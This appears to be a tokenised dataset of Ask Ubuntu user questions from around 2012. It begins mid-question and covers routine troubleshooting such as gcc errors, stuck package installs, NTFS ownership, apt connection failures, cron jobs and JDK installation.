programs : =/usr/lib/gcc/x86_64-linux-gnu/4.4.3/ : /usr/lib/gcc/x86_64-linux-gnu/4.4.3/ : /usr/lib/gcc/x86_64-linux-gnu/ : /usr/lib/gcc/x86_64-linux-gnu/4.4.3/ : /usr/lib/gcc/x86_64-linux-gnu/ : /usr/libexec/gcc/x86_64-linux-gnu/4.4.3/ : /usr/libexec/gcc/x86_64-linux-gnu/ : /usr/lib/gcc/x86_64-linux-gnu/4.4.3/ : /usr/lib/gcc/x86_64-linux-gnu/ : /usr/lib/gcc/x86_64-linux-gnu/4.4.3/../../../../x86_64-linux-gnu/bin/x86_64-linux-gnu/4.4.3/ : /usr/lib/gcc/x86_64-linux-gnu/4.4.3/../../../../x86_64-linux-gnu/bin/ libraries : =/usr/lib/gcc/x86_64-linux-gnu/4.4.3/ : /usr/lib/gcc/x86_64-linux-gnu/4.4.3/ : /usr/lib/gcc/x86_64-linux-gnu/4.4.3/../../../../x86_64-linux-gnu/lib/x86_64-linux-gnu/4.4.3/ : /usr/lib/gcc/x86_64-linux-gnu/4.4.3/../../../../x86_64-linux-gnu/lib/../lib/ : /usr/lib/gcc/x86_64-linux-gnu/4.4.3/../../../x86_64-linux-gnu/4.4.3/ : /usr/lib/gcc/x86_64-linux-gnu/4.4.3/../../../../lib/ : /lib/x86_64-linux-gnu/4.4.3/ : /lib/../lib/ : /usr/lib/x86_64-linux-gnu/4.4.3/ : /usr/lib/../lib/ : /usr/lib/x86_64-linux-gnu/x86_64-linux-gnu/4.4.3/ : /usr/lib/x86_64-linux-gnu/../lib/ : /usr/lib/gcc/x86_64-linux-gnu/4.4.3/../../../../x86_64-linux-gnu/lib/ : /usr/lib/gcc/x86_64-linux-gnu/4.4.3/../../../ : /lib/ : /usr/lib/ : /usr/lib/x86_64-linux-gnu/ i have also tried to compile the hello file with gcc-4.3 hello.c -o hello and it works . however , i can not run cmake commands and moreover downloading and building packages from the repositories fails with gcc : error trying to exec 'cc1 ' : execvp : no such file or directory ( i guess because cmake and dpkg do not know how to use gcc-4.3 instead of gcc ) . -- sudo ldconfig : /sbin/ldconfig.real : file /usr/local/cuda/lib/libcurand.so is empty , not checked . /sbin/ldconfig.real : file /usr/local/cuda/lib/libcusparse.so.4 is truncated /sbin/ldconfig.real : file /usr/local/cuda/lib/libcusparse.so is truncated /sbin/ldconfig.real : file /usr/local/cuda/lib/libcusparse.so.4.0.12 is truncated /sbin/ldconfig.real : file /usr/local/cuda/lib/libcurand.so.4.0.12 is empty , not checked . /sbin/ldconfig.real : file /usr/local/cuda/lib/libcurand.so.4 is empty , not checked . maybe the problem has something to do with cuda installed on the system ? i have tried to re-install build-essential , but it did not help . i have also made an attempt to re-install the c preprocessor ( cpp ) , but the system made a caution that it will remove a lot of core packages ( like acpi-support , xserver-xorg-* , etc ) , so i did not do that .
164137	problem regarding ubuntu software center	a day back everything was fine when using the software center . the problem started after attempting to install the app named 'shutter ' ( app for taking screenshots ) yeasterday . i started the install then went to watch a movie came back to my pc 3hrs later it was showing 'applying changes ' it was odd as the software was just 15mb and should have got over . later on ... after 2 hours of staring 'applying changes ' i could n't wait no more and had to shutdown the pc . today morning when i opened the software center the 'applying changes ' was still there , i can not install any other software using the center as it says 'waiting ' for the shutter app to finish and i want to stop the installing but just ca n't as there is no x or cancel button to stop it . using the terminal i 've tried > > mohd_arafat_hossain @ tud : ~ $ sudo killall -9 apt-get [ sudo ] password for mohd_arafat_hossain : apt-get : no process found mohd_arafat_hossain @ tud : ~ $ sudo dpkg -- configure -a dpkg : error : dpkg status database is locked by another process mohd_arafat_hossain @ tud : ~ $ what am i supposed to do now ?
164139	prevent shutdown when rsnapshot is running	since shutdowns during rsnapshot operation will lead to inconsistent/partial backups , i wonder how to delay the system shutdown while rsnapshot is active . the task is complicated by the fact that i need a solution which is compatible with non-expert users i.e . i need to tell reliably to the user that he needs to wait until the process is finished and not to do a hard reset . once this is the case shutdown should continue . a possible solution could be to replace the action of the window managers ( mostly kde ) shutdown/restart/hibernate buttons by a script which first checks if rsync is active and shows a message if this is the case . but i do not know if this is possible in kde .
164141	problems with wubi-installed ubuntu freezing , error reports not sending , programs crashing unexpectedly	recently i installed ubuntu 12.04 lts on my acer aspire one d255e netbook using the wubi installer for windows . i 've begun to notice several problems : computer freezes often for no apparent reason and has to be rebooted upon reboot , message appears saying `` errors were found when checking disk drive for '/ ' '' documents will not open in libreoffice message appears saying that ubuntu has experienced an internal error , but 'report a problem ' program always crashes before completion i have no technical knowledge so i 'm at a loss here . should i reinstall ? in the meantime , are any files that i have at risk ?
164150	why does everything keep changing back to root ownership ( ntfs ) ?	i 've tried everything to get my files back into my name , but all i seem to do is add more files to root ownership every time i try to fix things . it starts with getting my 2 ntfs partitions to mount at startup . pysdm will set the partitions to mount , but then it also makes everything owned by root . i change the ownership , and it just does n't `` take '' . there 's no error messages , the next time i open the program , everything is right back to being owned by root . i tried running it with sudo via terminal , and changing it then , but it still did n't take , and seemed to create more permission problems ( that i ca n't remember right now , sorry ) . then i read that using sudo would change the permissions to root on it 's own , and i should use gksudo or gksu , and that should work , but it did nothing . i reinstalled ubuntu , and tried just manually editing the fstab file , but that did n't work either . i kept getting errors on bootup that the partitions could n't be mounted . plus i had weird extra non-existent drives just sitting there all the time . i 'm sure i did something wrong there , but i checked it a million times and everything looked in perfect order . those phantom drives where not in my fstab file . so ! i reinstalled ubuntu again , and try ntfs-config instead , as recommended . it mounts my drives , and again , changes ownership to root and i ca n't unmount them if i want . i try to change it back with chown -hr myname : myname /media/ [ the drives ] , and it changed all the ownership of all my files to root too . these files were already owned by me , and with the command to change everything to my name , it changed everything to root . now i 'm really screwed . perhaps the weirdest : i tried accessing nautilus with sudo and gksu , and when i try to change the permission with the gui , by right clicking and changing the ownership and group , i select my name from the menu , it shows my name for a second , and then immediately reverts back to root . it just wo n't `` take '' either . why ! ? ! ? ! ? ! why does everything keep changing to root ! ? why do all my attempts function enough to change the ownership , but only to root and not back ? please help ! ! !
164152	amazon instant videos stopped working in chrome ( i did install hal ) and it works in firefox	since last week i can watch amazon instant videos only works in firefox but not in chrome , i re-installed hal but still does n't help . the progress bar goes but it shows black screen video with no sound . my chrome version is version 20.0.1132.57 my ubuntu 12.10 is 64 bit
164167	how do i install ubuntu to another partition from within ubuntu ?	hi i have been looking in to installing a linux image from within ubuntu as i ran out of cd 's . i am currently experiencing problems with my 12.04 and would like to install a second copy to an empty partition on my hdd for testing fixes , the problem i am having is most guides show how to do this from within windows but i want to do it from ubuntu . i tried unetbootin but just got a black screen after grub any suggestions ?
164168	multimedia keys do not work with spotify	even though spotify shows up in the indicator-sound just fine ( controlling it works from there ) using multimedia keys on your keyboard does nothing . when i open up rhythmbox they 're able to control the music there , so the keyboard settings seem ok .
164169	`` unable to connect '' error with apt-get ?	i recently installed 12.04 but am unable to run sudo apt-get update and consequently sudo apt-get install xxx . when i run the first command i get several ign http : //extras.ubuntu.com precise inrelease and err http : //extras.ubuntu.com precise release.gpg unable to connect to extras.ubuntu.com it works fine to wget extras.ubuntu.com . my /etc/apt/sources.list is the original file with swedish mirrors se.archive.ubuntu.com/ubuntu . for what it is worth i have tried other mirrors with the same result . my sources.list can be found here . update i am aware that there are many questions like this one , no one has helped me though . i performed the following commands with no change in result . sudo mv /etc/apt/sources.list /etc/apt/sources.list.backup sudo vi /etc/apt/sources.list and pasted # # # # # # # # # # # # # # # # # # # official ubuntu repos # # # # # # # # # # # # # # # # # # # # # # # # # ubuntu main repos deb http : //se.archive.ubuntu.com/ubuntu/ precise main deb-src http : //se.archive.ubuntu.com/ubuntu/ precise main # # # # # # ubuntu update repos deb http : //se.archive.ubuntu.com/ubuntu/ precise-security main deb http : //se.archive.ubuntu.com/ubuntu/ precise-updates main deb http : //se.archive.ubuntu.com/ubuntu/ precise-proposed main deb http : //se.archive.ubuntu.com/ubuntu/ precise-backports main deb-src http : //se.archive.ubuntu.com/ubuntu/ precise-security main deb-src http : //se.archive.ubuntu.com/ubuntu/ precise-updates main deb-src http : //se.archive.ubuntu.com/ubuntu/ precise-proposed main deb-src http : //se.archive.ubuntu.com/ubuntu/ precise-backports main output from wget -s -- spider http : //extras.ubuntu.com spider mode enabled . check if remote file exists . -- 2012-07-16 14:06:21 -- http : //extras.ubuntu.com/ resolving ... connecting to ... connected . proxy request sent , awaiting response ... http/1.1 200 ok date : mon , 16 jul 2012 10:05:19 gmt server : apache/2.2.8 ( ubuntu ) content-type : text/html ; charset=utf-8 connection : close length : unspecified [ text/html ] remote file exists and could contain further links , but recursion is disabled -- not retrieving . output from apt-config dump apt `` '' ; apt : :architecture `` i386 '' ; apt : :build-essential `` '' ; apt : :build-essential : : `` build-essential '' ; apt : :install-recommends `` 1 '' ; apt : :install-suggests `` 0 '' ; apt : :authentication `` '' ; apt : :authentication : :trustcdrom `` true '' ; apt : :neverautoremove `` '' ; apt : :neverautoremove : : `` ^firmware-linux . * '' ; apt : :neverautoremove : : `` ^linux-firmware $ '' ; apt : :neverautoremove : : `` ^linux-image . * '' ; apt : :neverautoremove : : `` ^kfreebsd-image . * '' ; apt : :neverautoremove : : `` ^linux-restricted-modules . * '' ; apt : :neverautoremove : : `` ^linux-ubuntu-modules- . * '' ; apt : :neverautoremove : : `` ^gnumach $ '' ; apt : :neverautoremove : : `` ^gnumach-image . * '' ; apt : :never-markauto-sections `` '' ; apt : :never-markauto-sections : : `` metapackages '' ; apt : :never-markauto-sections : : `` restricted/metapackages '' ; apt : :never-markauto-sections : : `` universe/metapackages '' ; apt : :never-markauto-sections : : `` multiverse/metapackages '' ; apt : :never-markauto-sections : : `` oldlibs '' ; apt : :never-markauto-sections : : `` restricted/oldlibs '' ; apt : :never-markauto-sections : : `` universe/oldlibs '' ; apt : :never-markauto-sections : : `` multiverse/oldlibs '' ; apt : :periodic `` '' ; apt : :periodic : :update-package-lists `` 1 '' ; apt : :periodic : :download-upgradeable-packages `` 0 '' ; apt : :periodic : :autocleaninterval `` 0 '' ; apt : :update `` '' ; apt : :update : :post-invoke-success `` '' ; apt : :update : :post-invoke-success : : `` touch /var/lib/apt/periodic/update-success-stamp 2 > /dev/null || true '' ; apt : :update : :post-invoke-success : : `` [ ! -f /var/run/dbus/system_bus_socket ] || /usr/bin/dbus-send -- system -- dest=org.debian.apt -- type=signal /org/debian/apt org.debian.apt.cachechanged || true '' ; apt : :archives `` '' ; apt : :archives : :maxage `` 30 '' ; apt : :archives : :minage `` 2 '' ; apt : :archives : :maxsize `` 500 '' ; apt : :changelogs `` '' ; apt : :changelogs : :server `` http : //changelogs.ubuntu.com/changelogs '' ; apt : :architectures `` '' ; apt : :architectures : : `` i386 '' ; apt : :compressor `` '' ; apt : :compressor : : . `` `` ; apt : :compressor : : . : :name `` . `` ; apt : :compressor : : . : :extension `` '' ; apt : :compressor : : . : :binary `` '' ; apt : :compressor : : . : :cost `` 1 '' ; apt : :compressor : : . : :compressarg `` '' ; apt : :compressor : : . : :compressarg : : `` '' ; apt : :compressor : : . : :uncompressarg `` '' ; apt : :compressor : : . : :uncompressarg : : `` '' ; apt : :compressor : :gzip `` '' ; apt : :compressor : :gzip : :name `` gzip '' ; apt : :compressor : :gzip : :extension `` .gz '' ; apt : :compressor : :gzip : :binary `` gzip '' ; apt : :compressor : :gzip : :cost `` 2 '' ; apt : :compressor : :gzip : :compressarg `` '' ; apt : :compressor : :gzip : :compressarg : : `` -9n '' ; apt : :compressor : :gzip : :uncompressarg `` '' ; apt : :compressor : :gzip : :uncompressarg : : `` -d '' ; apt : :compressor : :bzip2 `` '' ; apt : :compressor : :bzip2 : :name `` bzip2 '' ; apt : :compressor : :bzip2 : :extension `` .bz2 '' ; apt : :compressor : :bzip2 : :binary `` bzip2 '' ; apt : :compressor : :bzip2 : :cost `` 3 '' ; apt : :compressor : :bzip2 : :compressarg `` '' ; apt : :compressor : :bzip2 : :compressarg : : `` -9 '' ; apt : :compressor : :bzip2 : :uncompressarg `` '' ; apt : :compressor : :bzip2 : :uncompressarg : : `` -d '' ; apt : :compressor : :lzma `` '' ; apt : :compressor : :lzma : :name `` lzma '' ; apt : :compressor : :lzma : :extension `` .lzma '' ; apt : :compressor : :lzma : :binary `` lzma '' ; apt : :compressor : :lzma : :cost `` 4 '' ; apt : :compressor : :lzma : :compressarg `` '' ; apt : :compressor : :lzma : :compressarg : : `` -9 '' ; apt : :compressor : :lzma : :uncompressarg `` '' ; apt : :compressor : :lzma : :uncompressarg : : `` -d '' ; apt : :compressor : :xz `` '' ; apt : :compressor : :xz : :name `` xz '' ; apt : :compressor : :xz : :extension `` .xz '' ; apt : :compressor : :xz : :binary `` xz '' ; apt : :compressor : :xz : :cost `` 5 '' ; apt : :compressor : :xz : :compressarg `` '' ; apt : :compressor : :xz : :compressarg : : `` -6 '' ; apt : :compressor : :xz : :uncompressarg `` '' ; apt : :compressor : :xz : :uncompressarg : : `` -d '' ; dir `` / '' ; dir : :state `` var/lib/apt/ '' ; dir : :state : :lists `` lists/ '' ; dir : :state : :cdroms `` cdroms.list '' ; dir : :state : :mirrors `` mirrors/ '' ; dir : :state : :extended_states `` extended_states '' ; dir : :state : :status `` /var/lib/dpkg/status '' ; dir : :cache `` var/cache/apt/ '' ; dir : :cache : :archives `` archives/ '' ; dir : :cache : :srcpkgcache `` srcpkgcache.bin '' ; dir : :cache : :pkgcache `` pkgcache.bin '' ; dir : :etc `` etc/apt/ '' ; dir : :etc : :sourcelist `` sources.list '' ; dir : :etc : :sourceparts `` sources.list.d '' ; dir : :etc : :vendorlist `` vendors.list '' ; dir : :etc : :vendorparts `` vendors.list.d '' ; dir : :etc : :main `` apt.conf '' ; dir : :etc : :netrc `` auth.conf '' ; dir : :etc : :parts `` apt.conf.d '' ; dir : :etc : :preferences `` preferences '' ; dir : :etc : :preferencesparts `` preferences.d '' ; dir : :etc : :trusted `` trusted.gpg '' ; dir : :etc : :trustedparts `` trusted.gpg.d '' ; dir : :bin `` '' ; dir : :bin : :methods `` /usr/lib/apt/methods '' ; dir : :bin : :solvers `` '' ; dir : :bin : :solvers : : `` /usr/lib/apt/solvers '' ; dir : :bin : :dpkg `` /usr/bin/dpkg '' ; dir : :bin : :lzma `` /usr/bin/lzma '' ; dir : :bin : :xz `` /usr/bin/xz '' ; dir : :bin : :bzip2 `` /bin/bzip2 '' ; dir : :media `` '' ; dir : :media : :mountpath `` /media/apt '' ; dir : :log `` var/log/apt '' ; dir : :log : :terminal `` term.log '' ; dir : :log : :history `` history.log '' ; dir : :ignore-files-silently `` '' ; dir : :ignore-files-silently : : `` ~ $ '' ; dir : :ignore-files-silently : : `` \.disabled $ '' ; dir : :ignore-files-silently : : `` \.bak $ '' ; dir : :ignore-files-silently : : `` \.dpkg- [ a-z ] + $ '' ; dir : :ignore-files-silently : : `` \.save $ '' ; dir : :ignore-files-silently : : `` \.orig $ '' ; dir : :ignore-files-silently : : `` \.distupgrade $ '' ; acquire `` '' ; acquire : :cdrom `` '' ; acquire : :cdrom : :mount `` /media/cdrom/ '' ; acquire : :languages `` '' ; acquire : :languages : : `` en_us '' ; acquire : :languages : : `` en '' ; acquire : :languages : : `` none '' ; aptitude `` '' ; aptitude : :get-root-command `` sudo : /usr/bin/sudo '' ; unattended-upgrade `` '' ; unattended-upgrade : :allowed-origins `` '' ; unattended-upgrade : :allowed-origins : : `` $ { distro_id } : $ { distro_codename } -security '' ; dpkg `` '' ; dpkg : :pre-install-pkgs `` '' ; dpkg : :pre-install-pkgs : : `` /usr/sbin/dpkg-preconfigure -- apt || true '' ; dpkg : :post-invoke `` '' ; dpkg : :post-invoke : : `` if [ -d /var/lib/update-notifier ] ; then touch /var/lib/update-notifier/dpkg-run-stamp ; fi ; if [ -e /var/lib/update-notifier/updates-available ] ; then echo > /var/lib/update-notifier/updates-available ; fi `` ; commandline `` '' ; commandline : :asstring `` apt-config dump '' ;
164170	why do i get a blank desktop upon login ?	i shut down my computer for the week-end and when i came back this morning , it would n't open my session . ubuntu starts and display the session log in menu . when i choose the guest session every thing works fine . but when i try with my own session , i am blocked on an empty screen ( just the default ubuntu wallpaper ) . i tried with every login option ( classic , classic [ no effects ] , unity , unit 2d ) , the prblem is the same with every one of them . i was on ubuntu 11.10 , and upgraded to 12.04 . the problem still occures . if i log in the console ( ctr+alt+f1 ) , it works ... do you have any suggestion ? maybe start my session from the console , or any other idea you could have ...
164172	unable to run vmware player 3.0.0-203739 on ubuntu 12.04 lts	as the title states i am unable to run vmware player 3.0.203739 on a ubuntu 12.04 lts system , when attempt to run the program i get the following error message : '' kernel headers 3.2.0-23-generic-pae kernel headers for version 3.2.0-23-generic-pae were not found . if you installed them in a non-default path you can specify the path below . otherwise refer to your distribution 's documentation for installation instructions and click refresh to search again in default locations . '' however while installing the the program i install the essential headers required using the following commands : sudo apt-get update and sudo apt-get install build-essential linux-headers-generic any suggestions as to way this happens ? thanks .
164176	where can i find webmin for ubuntu 10 ?	i would like to install webmin , but it is neither available from synaptic , nor from apt-get . why ca n't i find it in synaptic or apt-get ? how can i get it and install ?
164179	please recommend partition sizes for my dual-boot configuration ( 1tb , big ntfs partition , big apps )	it 's the first time i install ubuntu . i need some advise to plan a good partition strategy for a ubuntu ( 12.04 ) + windows7 ( 64bit ) system . i have 1tb hard disk , 8gb ram . i 'd like to have a big partition ntfs to share data between the two os i often use a lot of ( big ) apps . ( so my partition widows c : must takes about 150gb ) what is the partition size should i put for root and home ? / ( ? ? ? - > 20gb ? ) /home ( ? ? ? - > 20gb ? ) /swap ( 16gb ) windows ( 150gb ) sharedriver ( ntfs max left space ) if i install and use a lot of apps , will the 20gb be too small for root and /home ? will it quickly be filled up over time ? i 've never used ubuntu , so i have no ideas what is the reasonable numbers in my case . please help . thanks
164180	different ways of executing binaries and scripts	i 've been using linux for some time now and i 've been searching for a complete overview of this but not found any . i just do n't come to terms with all the different ways of executing scripts and binaries - it 's all a big mess for me and i have to use trial-and-error to determine what i should use . for a file which is a script or a binary < script/binary > , i can come up with the following alternatives : < script/binary > . < script/binary > ./ < script/binary > source < script/binary > sh < script/binary > ( are there more ? ) can someone give a complete overview of what commands work with which kinds of files , and what the difference is when there are multiple options ? thanks .
164181	how do i get the launch menus in kde to use kdeusdo ?	i am using kde 4.4.5 . when i try to run an application that needs root , i am asked for root password . in gnome i am asked for my password . gnome used gksudo , gksu-properties is configured to use sudo mode . i have no root password ( it is not set on this machine ) . i am not getting the kdesudo box when launching applications that are marked in menu editor as run as another user , i think there is a problem with the way the kde desktop environment is setup . how do i tell the kde menus to use kdesudo ? have installed kdesudo , but it makes no difference . i originally installed the default system , without kde . i then added kde . i just added kde-full . ( still not working ) i have discovered that some admin applications launch properly , they have as there command gksudo âś . i think this is not perfect as it will cause gtk libraries to load unnecessarily .
164187	how to measure desktop login time with bootchart	i 've got an issue whereby after each reboot the first time i log into my session it takes ages . that is , it can take up to five minutes from the moment i enter my password until i can use the desktop . i was trying to use bootchart to debug the issue , but while bootchart itself worked , the graphics output are cropped at 105 seconds , so i can not even see when compiz starts . looking at /etc/init/bootchart.conf , it seems the graphic is cropped indeed after compiz start , but it does n't seem to be my case bootchart -- format= $ format \ -- crop-after=compiz , metacity , mutter , kwin , xfwm4 \ -- annotate=ureadahead , mountall , hostname , hwclock \ -- annotate=xorg \ -- annotate=gdm-session-worker \ -- output= '' /var/log/bootchart '' `` $ tarball '' here is some example output . is there any way i can see a longer time axis on the graph , at least until the desktop is loaded ?
164191	why in many themes my menus are too white ( text and background ) ?	i started using lubuntu ( 12.04 ) and i like the customizations that i was able to make , especially fitting icons and themes ( 'widgets ' - as 'customize look and feel'/lxappearance calls them . ) but for some reason about a half of the themes make my menus display a pale font on a whitish background - and look unclear . so , i am stuck with customizations involving themes that are darker or that otherwise do n't lead to this . i am aware only of some but important menus that are affected by this , like the main menus , right-click context menus of file browsers and the firefox right-click and drop-down menus . the right click menus of the tray items are not affected , nor the password area , nor other important parts in file browsers or applications , as other people experienced and reported in askubuntu . i think the problem is more with the colour of the fonts than with the background and that some small tweak might t solve this . i think lubuntu is not concerned by the issue of compatibility between themes and gtk3 .
164195	ubuntu one authentication failed	ubuntu one fails to authenticate from my new ubuntu 12.04 64 bit installation but i can access my account from a browser . i 've tried resetting the password several times and i 've also tried reinstalling ubuntu one as per the directions given in the ubuntu one website . any help is appreciated .
164197	cut and copy in ubuntu command line	how could i copy or cut a file from a directory to another directory ? i mean in command line !
164199	ubuntu 12.04 ldap client issue	i followed the guide described here configure ldap , but i keep getting following error when running `` getent passwd '' , is there any reason for that ? error : jul 16 15:58:33 wso2-virtualbox getent : nss_ldap : could not search ldap server - server is unavailable ^ [ [ ajul 16 15:59:34 wso2-virtualbox getent : nss_ldap : failed to bind to ldap server ldapi : ///192.168.4.152/ : invalid credentials jul 16 15:59:34 wso2-virtualbox getent : nss_ldap : could not search ldap server - server is unavailable configuration files : vi /etc/ldap.conf base dc=example , dc=com uri ldapi : ///192.168.4.152/ ldap_version 3 timelimit 4 bind_timelimit 4 bind_policy soft pam_password md5 nss_initgroups_ignoreusers avahi , avahi- autoipd , backup , bin , colord , daemon , games , gnats , hplip , irc , kernoops , libuuid , lightdm , list , lp , mail , man , messagebus , news , nslcd , openldap , proxy , pulse , root , rtkit , saned , speech-dispatcher , sshd , sync , sys , syslog , usbmux , uucp , whoopsie , www-data
164202	does remmina come with ubuntu 12.04 cd ?	i want to try ubuntu 12.04 and test remmina rdp viewer ( i hear it is a good one ) . however i am in no mood to download the dvd . does remmina come in the cd download ? can someone confirm ? ps : i do not have an internet connection on the system i need to try it on - just an internal network . regards
164203	xfce suspend system command	when i click on the exit icon there is a suspend option . when i click this the computer suspends , which works really well . i want to create a custom key mapping on the suspend command xk86sleep ( thinkpad sleep button ) which i can create using the keyboard settings . i have seen pm-suspend from numerous sources , but this requires root and so does not work . what command does xfce use when pressing the suspend option through the ui as described above ? xfce 4.8 , ubuntu 12.04 , thinkpad t60
164208	how to move a window between monitors with gnome shell ?	i see this question is `` answered '' by stating that there is no way to do this in gnome : how to move windows around and between monitors , using keyboard short cuts ? i have doubts that it should be impossible and i really want to do it . is there really no way to do this is gnome ? this is my output from xrandr that i do n't know how to use : $ xrandr xrandr : failed to get size of gamma for output default screen 0 : minimum 3840 x 1200 , current 3840 x 1200 , maximum 3840 x 1200 default connected 3840x1200+0+0 0mm x 0mm 3840x1200 50.0*
164212	why are my firefox control buttons disappearing ?	not sure if this is a `` fault '' or just me . the window control buttons ( top left ) in firefox disappear behind the unity launch bar on the left of the screen when firefox is maximised . it is then impossible to resize the window as there are no controls . alt tab and alt f4 provide workarounds but are hardly convenient . is this issue `` normal '' or am i missing something ? this is my second day with ubuntu / unity . ( loving it ! ! ! ! ! )
164213	is there a way to insert a worksheet directly to libre office writer ?	in ms office word , i can insert a worksheet directly from the insert tab . is it also possible in libre office 3 writer , that is to insert a worksheet within the program , without the need to open a spreadsheet application ? the only method that i know is to launch libreoffice calc and select the range of cells , then copy and paste it in libreoffice writer .
164218	what is mozilla xpcom and how i install it on ubuntu	i am trying to build libgluezilla - https : //github.com/mono/gluezilla which is important part of mono ( required by webbrowser package ) which was removed from latest ubuntu version , however i get this : checking mozilla xpcom 1.8 ... you need to install the mozilla xpcom development package . what is that and how i find it ? i installed mozilla xulrunner which is supposed to contain this , however it did n't solve the issue .
164224	cron job not executing	i was making a cron job to save my minecraft world from my ram every 5 minutes . i tested the script and it seems to be working . this is what the script looks like : # ! /bin/sh volatile= '' /home/jonathan/games/minecraft/server/world/ '' permanent= '' /home/jonathan/games/minecraft/server/world_storage/ '' rsync -r -t -v `` $ volatile '' `` $ permanent '' so then i went to add a cron job to run the script every 5 minutes , and it does n't seem to be running it . this is the script i used : */5 * * * * bash /home/jonathan/games/minecraft/server/backup.sh can anyone help me please ?
164226	changing my vm to static ip	so i 'm running a ubuntu virtual machine ( using vmware ) , and i noticed every time i restart my vm , my ip changes , is there a way to set it static ? i looked over a few links and they all tell me to change it to static and something about changing the dhcp server to return static ip . any help would be greatly appreciated .
164227	how to mount an iso file ?	i 'm running into trouble trying to mount a large iso : dev @ dev-optiplex-745 : ~ $ sudo mount -o loop /home/dev/h채mtningar/matlab2011a_64.iso /cdrom mount : warning : /cdrom seems to be mounted read-only . dev @ dev-optiplex-745 : ~ $ can you tell me how i should do it ?
164228	after uploading , how can i reorganize my files on ubuntu one cloud storage using a mac ?	for example , i uploaded 13 files , now i want to put them in a folder for better organization . right now i can not see a way to move files around once uploaded . i would hate to have to reupload all my files again just to put them in folders . i am using a mac .
164233	how do i resume video play from the point it was stopped with vlc ?	how can i play a video starting from the point it was stopped last time ? this is useful for watching long videos . i am using ubuntu 12.04 lts and vlc media player .
164234	will there be smileys support in gnome shell notifications ?	first i should say i love gnome shell a lot . its awesome and its notifications are too good . i can directly chat in them without even opening another window . but my only problem is it does n't recognize smileys . it just displays them as simple text . but i love smileys a lot and i miss them : ( any idea how to enable them ( i dont think we can enable them ) and if not , any idea if its in road map of gnome shell ?
164240	youtube videos are playing in fast & slow motion in chrome & firefox respectively	i have ubuntu 12.04 , 32-bit . i 've been having this problem for a couple of days now.. youtube videos are playing in fast forward on google chrome and in slow motion on firefox ! i have read some of the suggestions about it . so far i 've installed volume control and i 've changed the output audio device from hdmi to built-in speakers like someone suggested but i 'm still having the same problem . i also saw another suggestion about the different plugins for flash and them clashing but i have no clue how to fix that . please help ? bearing in mind that i 'm a beginner and do n't know much about programming at all !
164241	ubuntu 12.04 mobile broadband settings with terminal	i installed ubuntu 12.04 lts to my beaglebone and now want to make appropriate changes to be able to use my huawei e173 modem . i can successfully use huawei e173 on my desktop ubuntu 12.04 . but i can not use the same method on my beaglebone . because i can only use terminal screen . therefore i thought if i know the files that my desktop pc modifies for mobile broadband settings , than i can copy them to the beaglebone and start using huawei modem . however i could not find all the files that are related to mobile broadband settings . seems like all the files under /etc/ppp are related /usr/sbin/chat is related /etc/chatscripts/pap is related . what more do i need ? for example i could not figure out where it saves my 3g modem 's password . where is it located ? regards
164247	sound freezes ( beeping ) - sound blaster x-fi hd	i have the problem that after listening to the music ( about 15 minutes ) , the only sound coming out is a beep sound . if i plug off the usb , and insert it again , everything is okay . have anyone experiented this problem ? os : ubuntu 12.04 problem : sound blaster x-fi usb
164248	the wifi is not working in my vaio vpc y11v9e ?	bluetooth is working but the wifi not . please , what am i supposed to do . i do n't want to switch back to win 7
164250	how to install jdk 1.7 using a rpm package ?	edit start i have had eclipse running for a while now . and have been developing a java based server . edit end today , eclipse , java project , right click , properties , java build path ( jdk 1.6 ) is suddenly reporting missing jars ` ( netx.jar , plugin.jar and gnome-java-bridge.jar ) . may be after a ubuntu auto update these jars went missing . it has also happened to my laptop a few days back . java -version java version `` 1.6.0_24 '' openjdk runtime environment ( icedtea6 1.11.3 ) ( 6b24-1.11.3-1ubuntu0.10.04.1 ) openjdk server vm ( build 20.0-b12 , mixed mode ) i could not find anyone else having a similar issue , so i thought i 'll upgrade to 1.7 . so i downloaded 1.7 jdk and jre from oracle i ran the following , on my ubuntu 10.04 sudo apt-get install alien dpkg-dev debhelper build-essential sudo alien jre-7u5-linux-i586.rpm sudo alien jdk-7u5-linux-i586.rpm unfortunately both report errors . these folders do exist in the path . make : *** [ binary-arch ] error 9 find : `jdk-1.7.0_05 ' : no such file or directory make : *** [ binary-arch ] error 9 find : `jre-1.7.0_05 ' : no such file or directory now when i try to install again , using sudo alien jdk-7u5-linux-i586.rpm i get error : incorrect format : unknown tag warning : skipping conversion of scripts in package jdk : postinst postrm prerm warning : use the -- scripts parameter to include the scripts . mkdir : can not create directory `jdk-1.7.0_05 ' : file exists unable to mkdir jdk-1.7.0_05 : at /usr/share/perl5/alien/package.pm line 257 .
164253	cups support for drivers	first sorry for my bad english . i do n't now is this right place for my question but i want to ask . can somebody tell me who are develop drivers for koncica minolta bizhub 163 on ubuntu for cups , and if somebody work on it where can i read the state of driver .
164257	get the upload url of a file copied to ubuntuone by shutter	i 'm using shutter to export screenshots into a folder which is synced with ubuntu one . shutter helpfully marks these files as public , and i get a notification ( via notifyosd ) that the file was uploaded and is available at a particular url . the issue is that this information is useless because the url is a random string and notify does n't allow interactions , such as copying from a notification . is there any way to : copy the url from the notification , or have shutter provide that information in a more-accessible way ?
164260	perform multiple statements in one line in python 3.2.3	is there a way to execute multiple statemens while performing them in one line , like this : import time print ( `` ok , i know how to write programs in python now . '' ) time.sleep ( 0.5 ) print ( `` . '' ) # this should print on the same line as the previous print statement . time.sleep ( 0.5 ) print ( `` . '' ) # ... as should this one ... so the output should be : ok , i know how to write programs in python now.*.* . *waits .5 seconds
164268	how do i tell apt not to install x11 & gnome dependencies cause i will use x11 forwarding ?	i want to run virt-manager from the server itself ( so that i can use the interface management feature which is not available over ssh connection ) . however , i plan to launch virt-manager over an ssh connection forwarding x11 to my laptop where i run a full ubuntu 12.04 desktop setup . when i run `` apt-get install virt-manager '' on the ubuntu 12.04 server it of course wants to add x11 server , gnome libraries , etc ... but i donâ´t want any of those on my server . is there a way to tell apt never to install graphical environment related packages because i will always forward x11 to a remote client ?
164273	path variable resets with reboot	just as the title indicates my path variable resets after every reboot . i read that i have to edit my bashrc file 's path variable , but i do n't have anything there that suggests anything related to the path variable .
164279	my music does n't sync with ipod touch 4g ios 5.1	i own an ipod touch 4g , it runs ios 5.1.1 , jailbroken . i also have my laptop running ubuntu 12.04 , with banshee and rhythmbox . i prefer banshee over rhythmbox . in both rhythmbox and banshee , whenever i sync my music , the device is getting filled with data , but when i open the music app , my music does n't show up . is there a fix for this ? i 've been looking around , and i 've only found fixes for 11.10 and 11.04 , and am desperate to try to sync again ( last time was about a week or two ago ) and reinstall the whole thing again to find it not working and filling up the thing . syncing works fine on my imac and my regular desktop .
